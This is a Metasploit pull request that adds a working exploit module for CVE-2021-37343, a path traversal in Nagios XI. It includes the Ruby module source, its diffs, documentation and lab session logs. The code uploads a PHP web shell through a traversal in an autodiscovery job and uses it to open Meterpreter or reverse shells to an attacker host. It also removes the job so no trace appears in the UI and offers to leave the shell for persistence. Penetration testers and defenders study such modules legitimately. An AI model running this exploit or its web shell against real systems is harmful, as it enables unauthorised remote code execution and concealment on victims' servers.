### PR TITLE
Nagios XI Web Shell Upload Module (CVE-2021-37343)

### DIFF
--- a/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
@@ -10,7 +10,7 @@ the web shell. A cron file will be created using the attacker's chosen path and 
 shell is embedded in the file.
 
 After the web shell has been written to the victim, this module will then use the webshell to establish
-a Meterpreter sesssion or a reverse shell. By default, the web shell is deleted by the module, and the
+a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the
 autodiscovery job is removed as well.
 
 ### Installation

--- a/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
@@ -51,6 +51,10 @@ The username to log in to the Nagios XI web interface with. The default is `nagi
 
 The password to log in with. Set to `nil` by default.
 
+### DEPTH
+
+The depth of the path traversal. Default is 10.
+
 ### WEBSHELL_NAME
 
 Allows the user to name the webshell. If the user doesn't provided a name then one will be automatically generated.

--- a/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
@@ -1,0 +1,222 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path
+traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as
+`www-data`. The module achieves this by creating an autodiscovery job with an `id` field containing a
+path traversal to a writable and remotely accessible directory, and `custom_ports` field containing
+the web shell. A cron file will be created using the attacker's chosen path and name, and the web
+shell is embedded in the file.
+
+After the web shell has been written to the victim, this module will then use the webshell to establish
+a Meterpreter sesssion or a reverse shell. By default, the web shell is deleted by the module, and the
+autodiscovery job is removed as well.
+
+### Installation
+
+The following was tested on Ubuntu 20.04.
+
+* wget https://assets.nagios.com/downloads/nagiosxi/5/xi-5.8.4.tar.gz
+* tar -xvf xi-5.8.4.tar.gz
+* cd nagiosxi
+* sudo ./fullinstall
+
+The installer will spend a good deal of time installing many things. Upon completion, navigate to
+the Web UI, accept license agreements, and configure the administrator username and password.
+
+## Verification Steps
+
+* Follow the instructions above to install Nagios XI 5.8.4 on Ubuntu 20.04
+* Do: `use exploit/linux/http/nagios_xi_autodiscovery_webshell`
+* Do: `set RHOST <ip>`
+* Do: `set PASSWORD <password>`
+* Do: `check`
+* Verify the target is flagged as vulnerable
+* Do: `set LHOST <ip>`
+* Do: `run`
+* You should get a Meterpreter session.
+
+## Options
+
+### TARGETURI
+
+Specifies base URI. The default value is `/nagiosxi`.
+
+### USERNAME
+
+The username to log in to the Nagios XI web interface with. The default is `nagiosadmin`.
+
+### PASSWORD
+
+The password to log in with. Set to `nil` by default.
+
+### WEBSHELL_NAME
+
+Allows the user to name the webshell. If the user doesn't provided a name then one will be automatically generated.
+Set to `nil` by default.
+
+### DELETE_WEBSHELL
+
+Indicates if the web shell should be deleted after the meterpreter session or reverse shell is established.
+A user may want to leave behind a web shell for persistence reasons. The default is `true`.
+
+## Scenarios
+
+### Nagios XI 5.8.4 - Get a Meterpreter Session
+
+```
+msf6 > use auxiliary/scanner/http/nagios_xi_scanner
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
+
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.8.4
+[+] The target appears to be vulnerable to the following 1 exploit(s):
+[*] 
+[*] 	CVE-2021-37343    exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] 
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
+LHOST => 10.0.0.3
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
+
+[*] Started reverse TCP handler on 10.0.0.3:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
+[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
+[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
+[*] Testing if web shell installation was successful
+[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
+[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
+[*] Sending stage (989032 bytes) to 10.0.0.6
+[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
+[*] Command Stager progress - 100.00% done (700/700 bytes)
+[*] Deleting autodiscovery job
+[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44224 ) at 2022-02-05 17:53:27 -0800
+
+meterpreter > shell
+Process 800816 created.
+Channel 1 created.
+uname -a
+Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+whoami
+www-data
+pwd
+/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
+```
+
+### Nagios XI 5.8.4 - Get a reverse shell
+
+```
+msf6 > use auxiliary/scanner/http/nagios_xi_scanner
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
+
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.8.4
+[+] The target appears to be vulnerable to the following 1 exploit(s):
+[*] 
+[*] 	CVE-2021-37343    exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] 
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0
+target => 0
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
+LHOST => 10.0.0.3
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
+
+[*] Started reverse double SSL handler on 10.0.0.3:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
+[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
+[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
+[*] Testing if web shell installation was successful
+[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
+[*] Executing Unix Command for cmd/unix/reverse_openssl
+[*] Deleting autodiscovery job
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo nyjlVFXNgWehsWFs;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "nyjlVFXNgWehsWFs\n"
+[*] Matching...
+[*] A is input...
+[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
+[*] Command shell session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44226 ) at 2022-02-05 17:56:49 -0800
+
+whoami
+www-data
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
+pwd
+/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
+```
+
+### Nagios XI 5.8.4 - Leave a web shell behind
+
+```
+msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
+LHOST => 10.0.0.3
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false
+DELETE_WEBSHELL => false
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php
+WEBSHELL_NAME => lobster.php
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
+
+[*] Started reverse TCP handler on 10.0.0.3:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
+[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
+[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
+[*] Testing if web shell installation was successful
+[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
+[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
+[*] Sending stage (989032 bytes) to 10.0.0.6
+[*] Command Stager progress - 100.00% done (700/700 bytes)
+[*] Deleting autodiscovery job
+[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44230 ) at 2022-02-05 18:07:14 -0800
+
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 10.0.0.6 - Meterpreter session 1 closed.  Reason: User exit
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > exit
+albinolobster@ubuntu:~/metasploit-framework$ curl --insecure https://10.0.0.6/nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php?cmd=id
+0 9 * * *	rm -f '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml'; touch '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch'; sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses='127.0.0.1/0' --exclude='' --output='../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml' --watch='/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch' --onlynew=0 --debug=1 --detectos=1 --detecttopo=1   --customports='uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
+' > '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.out' 2>&1 & echo $! > /dev/null 2>&1
+```

--- a/lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb
+++ b/lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb
@@ -1,18 +1,19 @@
 # -*- coding: binary -*-
 
+# Scans a Nagios XI target and suggests exploit modules to use
 module Msf::Exploit::Remote::HTTP::NagiosXi::RceCheck
   # Uses the Nagios XI version to check which CVEs and related exploit modules the target is vulnerable to, if any
   #
   # @param version [Rex::Version] Nagios XI version
   # @return [Hash], Hash mapping CVE numbers to exploit module names if the target is vulnerable, empty hash otherwise
-   def nagios_xi_rce_check(version)
+  def nagios_xi_rce_check(version)
     matching_exploits = {}
 
     # Storage area for known exploits that affect versions prior to the one in the hash key
     nagios_rce_version_prior = {
       '5.2.8' => [
         ['NO CVE AVAILABLE', 'nagios_xi_chained_rce']
-      ],
+      ]
     }
 
     nagios_rce_version_prior.each do |fixed_version, info|
@@ -53,10 +54,13 @@ module Msf::Exploit::Remote::HTTP::NagiosXi::RceCheck
       '5.6.0-5.7.3' => [
         ['CVE-2020-5791', 'nagios_xi_mibs_authenticated_rce']
       ],
+      '5.2.0-5.8.4' => [
+        ['CVE-2021-37343', 'nagios_xi_autodiscovery_webshell']
+      ]
     }
 
     nagios_rce_version_range.each do |fixed_version, info|
-      lower, higher = fixed_version.split("-")
+      lower, higher = fixed_version.split('-')
       lower = Rex::Version.new(lower)
       higher = Rex::Version.new(higher)
       if version >= lower && version <= higher

--- a/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
+++ b/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Auxiliary
         ['CVE', '2019-15949'],
         ['CVE', '2020-5791'],
         ['CVE', '2020-5792'],
-        ['CVE', '2020-35578']
+        ['CVE', '2020-35578'],
+        ['CVE', '2021-37343']
       ]
     )
     register_options [

--- a/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
+++ b/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
@@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
           and `custom_ports` field containing the web shell. A cron file will be created using the chosen
           path and file name, and the web shell is embedded in the file.
 
-          After the web shell has been written to the victim, this module will then use the webshell to
-          establish a Meterpreter sesssion or a reverse shell. By default, the web shell is deleted by
+          After the web shell has been written to the victim, this module will then use the web shell to
+          establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by
           the module, and the autodiscovery job is removed as well.
         },
         'License' => MSF_LICENSE,

--- a/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
+++ b/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Claroty Unit 82', # vulnerability discovery
+          'Claroty Team82', # vulnerability discovery
           'jbaines-r7' # metasploit module
         ],
         'References' => [

--- a/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
+++ b/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
@@ -232,7 +232,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :linux_dropper
       execute_cmdstager
     end
-
+  ensure
     cleanup_job
   end
 end

--- a/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
+++ b/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
@@ -146,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unknown, 'Failed to obtain the nsp token which is required to upload the web shell') if nsp.blank?
 
     # drop a basic web shell on the server
-    webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{datastore['WEBSHELL_NAME']}")
+    webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
     print_status("Uploading webshell to #{webshell_location}")
     php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
     payload = 'update=1&' \

--- a/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
+++ b/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
@@ -86,6 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options [
       OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
       OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),
+      OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]),
       OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
       OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
     ]
@@ -125,12 +126,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Using the path traversal, upload a php webshell to the remote target
   def drop_webshell
-    autodisc_uri = normalize_uri(target_uri.path, '/includes/components/autodiscovery/?mode=newjob')
+    autodisc_uri = normalize_uri(target_uri.path, '/includes/components/autodiscovery/')
     print_status("Attempting to grab a CSRF token from #{autodisc_uri}")
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => autodisc_uri,
-      'cookie' => @auth_cookies
+      'cookie' => @auth_cookies,
+      'vars_get' => {
+        'mode' => 'newjob'
+      }
     })
 
     fail_with(Failure::Disconnected, 'Connection failed') unless res
@@ -146,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Uploading webshell to #{webshell_location}")
     php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
     payload = 'update=1&' \
-      "job=../../../../../../../../../../../../../../../../../../../../../../../../../../../..#{@webshell_path}#{datastore['WEBSHELL_NAME']}&" \
+      "job=#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}&" \
       "nsp=#{nsp}&" \
       'address=127.0.0.1%2F0&' \
       'frequency=Yearly&' \
@@ -156,6 +160,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => autodisc_uri,
       'cookie' => @auth_cookies,
+      'vars_get' => {
+        'mode' => 'newjob'
+      },
       'data' => payload
     })
 
@@ -172,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # This is a great place to leave a web shell for persistence since it doesn't require auth
     # to touch it. By default, we'll clean this up but the attacker has to option to leave it
     if datastore['DELETE_WEBSHELL']
-      register_file_for_cleanup("#{@webshell_path}#{datastore['WEBSHELL_NAME']}")
+      register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")
     end
   end
 
@@ -180,12 +187,15 @@ class MetasploitModule < Msf::Exploit::Remote
   # the job that there is no evidence of exploitation in the UI.
   def cleanup_job
     print_status('Deleting autodiscovery job')
-    job = "job=../../../../../../../../../../../../../../../../../../../../../../../../../../../..#{@webshell_path}#{datastore['WEBSHELL_NAME']}&"
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, "/includes/components/autodiscovery/?mode=deletejob&#{job}"),
-      'cookie' => @auth_cookies
+      'uri' => normalize_uri(target_uri.path, '/includes/components/autodiscovery/'),
+      'cookie' => @auth_cookies,
+      'vars_get' => {
+        'mode' => 'deletejob',
+        'job' => "#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}"
+      }
     })
 
     fail_with(Failure::Disconnected, 'Connection failed') unless res
@@ -197,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = Rex::Text.uri_encode(cmd)
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/includes/components/highcharts/exporting-server/temp/#{datastore['WEBSHELL_NAME']}?cmd=#{cmd}")
+      'uri' => normalize_uri(target_uri.path, "/includes/components/highcharts/exporting-server/temp/#{@webshell_name}?cmd=#{cmd}")
     })
 
     fail_with(Failure::Disconnected, 'Connection failed') unless res
@@ -211,9 +221,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # create a randomish web shell name if the user doesn't specify one
-    if datastore['WEBSHELL_NAME'].nil? || datastore['WEBSHELL_NAME'].empty?
-      datastore['WEBSHELL_NAME'] = "#{Rex::Text.rand_text_alphanumeric(5..12)}.php"
-    end
+    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"
 
     drop_webshell
 

--- a/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
+++ b/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
@@ -1,0 +1,230 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::NagiosXi
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Nagios XI Autodiscovery Webshell Upload',
+        'Description' => %q{
+          This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343).
+          The path traversal allows a remote and authenticated administrator to upload a PHP web shell
+          and execute code as `www-data`. The module achieves this by creating an autodiscovery job
+          with an `id` field containing a path traversal to a writable and remotely accessible directory,
+          and `custom_ports` field containing the web shell. A cron file will be created using the chosen
+          path and file name, and the web shell is embedded in the file.
+
+          After the web shell has been written to the victim, this module will then use the webshell to
+          establish a Meterpreter sesssion or a reverse shell. By default, the web shell is deleted by
+          the module, and the autodiscovery job is removed as well.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Claroty Unit 82', # vulnerability discovery
+          'jbaines-r7' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2021-37343'],
+          ['URL', 'https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/']
+        ],
+        'DisclosureDate' => '2021-07-15',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl'
+              },
+              'Payload' => {
+                'Append' => ' & disown'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'MeterpreterTryToFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),
+      OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
+      OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
+    ]
+
+    @webshell_uri = '/includes/components/highcharts/exporting-server/temp/'
+    @webshell_path = '/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/'
+  end
+
+  # Authenticate and grab the version from the dashboard. Store auth cookies for later user.
+  def check
+    login_result, res_array = nagios_xi_login(datastore['USERNAME'], datastore['PASSWORD'], false)
+    case login_result
+    when 1..3 # An error occurred
+      return CheckCode::Unknown(res_array[0])
+    when 4
+      return CheckCode::Detected('Nagios is not fully installed.')
+    when 5
+      return CheckCode::Detected('The Nagios license has not been signed.')
+    end
+
+    # res_array[1] cannot be nil since the mixin checks for that already.
+    @auth_cookies = res_array[1]
+
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+    end
+
+    # affected versions are 5.2.0 -> 5.8.4
+    if Rex::Version.new(nagios_version) < Rex::Version.new('5.8.5') &&
+       Rex::Version.new(nagios_version) >= Rex::Version.new('5.2.0')
+      return CheckCode::Appears("Determined using the self-reported version: #{nagios_version}")
+    end
+
+    CheckCode::Safe("Determined using the self-reported version: #{nagios_version}")
+  end
+
+  # Using the path traversal, upload a php webshell to the remote target
+  def drop_webshell
+    autodisc_uri = normalize_uri(target_uri.path, '/includes/components/autodiscovery/?mode=newjob')
+    print_status("Attempting to grab a CSRF token from #{autodisc_uri}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => autodisc_uri,
+      'cookie' => @auth_cookies
+    })
+
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, 'Unexpected HTTP body') unless res.body.include?('<title>New Auto-Discovery Job')
+
+    # snag the nsp token from the response
+    nsp = get_nsp(res)
+    fail_with(Failure::Unknown, 'Failed to obtain the nsp token which is required to upload the web shell') if nsp.blank?
+
+    # drop a basic web shell on the server
+    webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{datastore['WEBSHELL_NAME']}")
+    print_status("Uploading webshell to #{webshell_location}")
+    php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
+    payload = 'update=1&' \
+      "job=../../../../../../../../../../../../../../../../../../../../../../../../../../../..#{@webshell_path}#{datastore['WEBSHELL_NAME']}&" \
+      "nsp=#{nsp}&" \
+      'address=127.0.0.1%2F0&' \
+      'frequency=Yearly&' \
+      "custom_ports=#{php_webshell}&"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => autodisc_uri,
+      'cookie' => @auth_cookies,
+      'data' => payload
+    })
+
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 302
+
+    # Test the web shell installed by echoing a random string and ensure it appears in the res.body
+    print_status('Testing if web shell installation was successful')
+    rand_data = Rex::Text.rand_text_alphanumeric(16..32)
+    res = execute_via_webshell("echo #{rand_data}")
+    fail_with(Failure::UnexpectedReply, 'Web shell execution did not appear to succeed.') unless res.body.include?(rand_data)
+    print_good("Web shell installed at #{webshell_location}")
+
+    # This is a great place to leave a web shell for persistence since it doesn't require auth
+    # to touch it. By default, we'll clean this up but the attacker has to option to leave it
+    if datastore['DELETE_WEBSHELL']
+      register_file_for_cleanup("#{@webshell_path}#{datastore['WEBSHELL_NAME']}")
+    end
+  end
+
+  # Successful exploitation creates a new job in the autodiscovery view. This function deletes
+  # the job that there is no evidence of exploitation in the UI.
+  def cleanup_job
+    print_status('Deleting autodiscovery job')
+    job = "job=../../../../../../../../../../../../../../../../../../../../../../../../../../../..#{@webshell_path}#{datastore['WEBSHELL_NAME']}&"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "/includes/components/autodiscovery/?mode=deletejob&#{job}"),
+      'cookie' => @auth_cookies
+    })
+
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res&.code == 302
+  end
+
+  # Executes commands via the uploaded webshell
+  def execute_via_webshell(cmd)
+    cmd = Rex::Text.uri_encode(cmd)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/includes/components/highcharts/exporting-server/temp/#{datastore['WEBSHELL_NAME']}?cmd=#{cmd}")
+    })
+
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200
+    res
+  end
+
+  def execute_command(cmd, _opts = {})
+    execute_via_webshell(cmd)
+  end
+
+  def exploit
+    # create a randomish web shell name if the user doesn't specify one
+    if datastore['WEBSHELL_NAME'].nil? || datastore['WEBSHELL_NAME'].empty?
+      datastore['WEBSHELL_NAME'] = "#{Rex::Text.rand_text_alphanumeric(5..12)}.php"
+    end
+
+    drop_webshell
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+
+    cleanup_job
+  end
+end


### PR DESCRIPTION
# Description

This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as `www-data`. The module achieves this by creating an autodiscovery job with an `id` field containing a path traversal to a writable and remotely accessible directory, and `custom_ports` field containing the web shell. A cron file will be created using the chosen path and file name, and the web shell is embedded in the cron file.

After the web shell has been written to the victim, this module will then use the web shell to establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the autodiscovery job is removed as well.

## Additional Details

I tied the module into @ErikWynter 's Nagios XI scanner (great stuff, Erik!). I only needed to slide in identifying information and all worked well. Rubocop had a few things to say about `rce_check.rb` that made the diff slightly bigger but nothing crazy. `msftidy` does have two complaints still about `rce_check.rb` - I would have fixed them but they are absolutely meaningless to me, hopefully a reviewer can provide guidance:

```
albinolobster@ubuntu:~/metasploit-framework$ ./tools/dev/msftidy.rb lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb
lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb - [ERROR] Unable to determine super class
